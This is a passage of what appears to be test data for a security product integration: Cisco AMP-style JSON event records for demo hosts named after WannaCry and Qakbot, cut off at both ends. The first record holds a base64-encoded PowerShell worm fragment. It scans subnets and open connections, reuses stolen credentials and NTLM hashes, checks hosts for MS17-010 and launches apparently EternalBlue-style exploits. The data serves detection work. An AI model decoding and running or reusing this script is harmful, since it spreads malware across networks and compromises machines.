KACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20200719101800,"sig_rev":1},"detection":"apde:20200719101800","end_ts":1610640884,"engine":"apde","id":"cF3A8bacac","name":"PowerShell Download String","observables":{"file":[{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1},{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1}]},"remediated":false,"severity":"medium","silent":true,"start_ts":1610640884,"tactics":["TA0002","TA0005"],"techniques":["T1059"],"type":"activity","normalized":{"observables":{"file":{"name":["wmiprvse.exe","powershell.exe"],"path":["c:\\windows\\system32\\wbem","c:\\windows\\system32\\windowspowershell\\v1.0"]}},"name":"powershell download string"},"ts":1610640884},"tactics":["TA0002","TA0005"],"techniques":["T1059"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":873000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":573000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat 